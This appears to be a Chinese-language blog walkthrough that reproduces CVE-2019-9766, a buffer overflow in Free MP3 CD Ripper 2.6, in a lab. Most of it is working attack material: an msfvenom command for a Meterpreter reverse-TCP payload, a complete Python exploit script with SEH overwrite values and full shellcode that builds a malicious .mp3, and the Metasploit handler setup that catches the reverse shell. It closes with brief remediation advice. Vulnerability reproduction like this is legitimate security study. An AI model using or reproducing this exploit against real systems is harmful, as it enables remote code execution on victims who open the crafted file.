CVE-2019-9766漏洞复现

这篇文章给大家介绍CVE-2019-9766漏洞复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

      CVE-2019-9766曝出了关于Free MP3 CDRipper的缓冲区溢出漏洞,在转换文件时,Free MP3 CD Ripper 2.6中基于堆栈的缓冲区溢出漏洞,可使远程攻击者通过诱导用户打开特制的.mp3文件执行任意代码。经测试该漏洞影响多个windows版本,包括Windows7及Windows10(需指定Free MP3 CD Ripper 2.6版本)。下文将使用metasploit对CVE-2019-9766进行漏洞复现。

环境准备

攻击机:Kali(建议网卡设置改为桥接模式) IP 192.168.50.113

靶机:Windows10 IP 192.168.50.232

首先,靶机需要安装存在漏洞的Free MP3CD Ripper 2.6,版本为重点。安装好后如下图:

CVE-2019-9766漏洞复现

生成与监听

打开kali下的metasploit,生成shellcode: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.50.113lport=2333 -f c –smallest

CVE-2019-9766漏洞复现

我们利用此shellcode去编写一个脚本,用于生成攻击payload。需要注意的是,应该使用python2版本。

buffer= "A" * 4116

NSEH= "/xeb/x06/x90/x90"

SEH= "/x84/x20/xe4/x66"

nops= "/x90" * 5

buf= ""

buf+= "/xfc/xe8/x82/x00/x00/x00/x60/x89/xe5/x31/xc0/x64/x8b/x50/x30"

buf+= "/x8b/x52/x0c/x8b/x52/x14/x8b/x72/x28/x0f/xb7/x4a/x26/x31/xff"

buf+= "/xac/x3c/x61/x7c/x02/x2c/x20/xc1/xcf/x0d/x01/xc7/xe2/xf2/x52"

buf+= "/x57/x8b/x52/x10/x8b/x4a/x3c/x8b/x4c/x11/x78/xe3/x48/x01/xd1"

buf+= "/x51/x8b/x59/x20/x01/xd3/x8b/x49/x18/xe3/x3a/x49/x8b/x34/x8b"

buf+= "/x01/xd6/x31/xff/xac/xc1/xcf/x0d/x01/xc7/x38/xe0/x75/xf6/x03"

buf+= "/x7d/xf8/x3b/x7d/x24/x75/xe4/x58/x8b/x58/x24/x01/xd3/x66/x8b"

buf+= "/x0c/x4b/x8b/x58/x1c/x01/xd3/x8b/x04/x8b/x01/xd0/x89/x44/x24"

buf+= "/x24/x5b/x5b/x61/x59/x5a/x51/xff/xe0/x5f/x5f/x5a/x8b/x12/xeb"

buf+= "/x8d/x5d/x68/x33/x32/x00/x00/x68/x77/x73/x32/x5f/x54/x68/x4c"

buf+= "/x77/x26/x07/x89/xe8/xff/xd0/xb8/x90/x01/x00/x00/x29/xc4/x54"

buf+= "/x50/x68/x29/x80/x6b/x00/xff/xd5/x6a/x0a/x68/xc0/xa8/x32/x71"

buf+= "/x68/x02/x00/x09/x1d/x89/xe6/x50/x50/x50/x50/x40/x50/x40/x50"

buf+= "/x68/xea/x0f/xdf/xe0/xff/xd5/x97/x6a/x10/x56/x57/x68/x99/xa5"

buf+= "/x74/x61/xff/xd5/x85/xc0/x74/x0a/xff/x4e/x08/x75/xec/xe8/x67"

buf+= "/x00/x00/x00/x6a/x00/x6a/x04/x56/x57/x68/x02/xd9/xc8/x5f/xff"

buf+= "/xd5/x83/xf8/x00/x7e/x36/x8b/x36/x6a/x40/x68/x00/x10/x00/x00"

buf+= "/x56/x6a/x00/x68/x58/xa4/x53/xe5/xff/xd5/x93/x53/x6a/x00/x56"

buf+= "/x53/x57/x68/x02/xd9/xc8/x5f/xff/xd5/x83/xf8/x00/x7d/x28/x58"

buf+= "/x68/x00/x40/x00/x00/x6a/x00/x50/x68/x0b/x2f/x0f/x30/xff/xd5"

buf+= "/x57/x68/x75/x6e/x4d/x61/xff/xd5/x5e/x5e/xff/x0c/x24/x0f/x85"

buf+= "/x70/xff/xff/xff/xe9/x9b/xff/xff/xff/x01/xc3/x29/xc6/x75/xc1"

buf+= "/xc3/xbb/xf0/xb5/xa2/x56/x6a/x00/x53/xff/xd5";

pad= "B" * (316 – len(nops) – len(buf) )

payload= buffer + NSEH + SEH + nops + buf +pad

try:

   f=open("TestFMCR.mp3","w")

    print "[+] Creating %s bytes mp3File…" %len(payload)

    f.write(payload)

    f.close()

    print "[+] mp3 File createdsuccessfully!"

except:

    print "File cannot be created!"

将生成的MP3文件先放至靶机,然后在攻击机中打开msf,设置攻击模块与监听(ip,端口等)

msfconsole

useexploit/multi/handler

set lhost 192.168.50.113

set lport 2333

set payload windows/meterpreter/reverse_tcp

然后开始监听:

exploit

CVE-2019-9766漏洞复现

结果

      设置好监听后,我们将准备好的MP3文件放入靶机运行。点击convert,选择文件,如果此处没有看到mp3文件的话,可能是他默认只显示.wav文件,下面改为全部文件即可。

CVE-2019-9766漏洞复现

选择好后直接选打开,程序开始读取转换文件。

CVE-2019-9766漏洞复现

运行后可能会闪退、未响应或是报错,毕竟这不是mp3文件。没有关系,我们可以看到监听那边已经有响应了。

CVE-2019-9766漏洞复现       

不得不说CVE-2019-9766漏洞利用价值比较低,虽然是缓冲区溢出造成的远程代码执行,但利用前提是目标机安装了Free MP3 CD Ripper,且必须为2.6版本。所有,这个漏洞也非常好修复:删除这个软件,或将其更新为更高的版本。

关于CVE-2019-9766漏洞复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

原创文章,作者:745907710,如若转载,请注明出处:https://blog.ytso.com/tech/safety/220039.html

(0)
上一篇 2022年1月2日 15:52
下一篇 2022年1月2日 15:52

相关推荐

发表回复

登录后才能评论